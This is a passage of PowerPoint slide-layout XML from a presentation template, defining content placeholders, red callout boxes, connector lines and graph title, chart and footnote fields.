              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6022713" y="1628775"/>
            <a:ext cx="0" cy="4500562"/>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3804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callout box red outline RHS">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45C0EDA6-30BF-40CD-8F70-325FE9113CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9139518" y="1449387"/>
            <a:ext cx="2556097" cy="4679947"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="180000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1449388"/>
            <a:ext cx="4007129" cy="4679949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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7" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3891F6E-543C-4D7C-BBAA-7E44B1B53ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876894" y="1449388"/>
            <a:ext cx="4007129" cy="4679949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2E842B-ECEA-499C-9002-362C557148D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621400" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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0642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callout box red solid RHS">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CE920C8B-DED1-4B6E-9C0F-FB38E253CA2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9139518" y="1449389"/>
            <a:ext cx="2556097" cy="4679946"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="180000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1449390"/>
            <a:ext cx="4007129" cy="4679948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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7" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3891F6E-543C-4D7C-BBAA-7E44B1B53ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876894" y="1449390"/>
            <a:ext cx="4007129" cy="4679948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2E842B-ECEA-499C-9002-362C557148D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4621400" y="1449389"/>
            <a:ext cx="0" cy="4679948"/>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54570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callout box red outline LH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5456429-D2D5-4AC3-84BC-F74857CDDDA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1449387"/>
            <a:ext cx="2556097" cy="4679947"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="180000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3170730" y="1449388"/>
            <a:ext cx="4007129" cy="4679949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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7" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3891F6E-543C-4D7C-BBAA-7E44B1B53ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689570" y="1449388"/>
            <a:ext cx="4007129" cy="4679949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2E842B-ECEA-499C-9002-362C557148D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7433714" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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4465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amp; 2 content with callout box red solid LH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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3170730" y="1449390"/>
            <a:ext cx="4007129" cy="4679948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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7" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3891F6E-543C-4D7C-BBAA-7E44B1B53ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689570" y="1449390"/>
            <a:ext cx="4007129" cy="4679948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2E842B-ECEA-499C-9002-362C557148D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7433714" y="1449389"/>
            <a:ext cx="0" cy="4679948"/>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9D66D40E-2B2C-466A-B2D7-1990CACF1CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1449389"/>
            <a:ext cx="2556097" cy="4679946"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="180000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11589685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graph with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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE376A4-7281-4F17-A9FD-693411D93715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039565" y="1457194"/>
            <a:ext cx="8112871" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFF319E-6DBC-44DF-A53F-FCD666A4AD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039831" y="1999130"/>
            <a:ext cx="8112338" cy="3854824"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733755BA-71D4-4CBA-B704-A972C8D5EFBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2039565" y="6024283"/>
            <a:ext cx="8112871" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23912733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 graphs with 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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6022713" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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7" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE376A4-7281-4F17-A9FD-693411D93715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
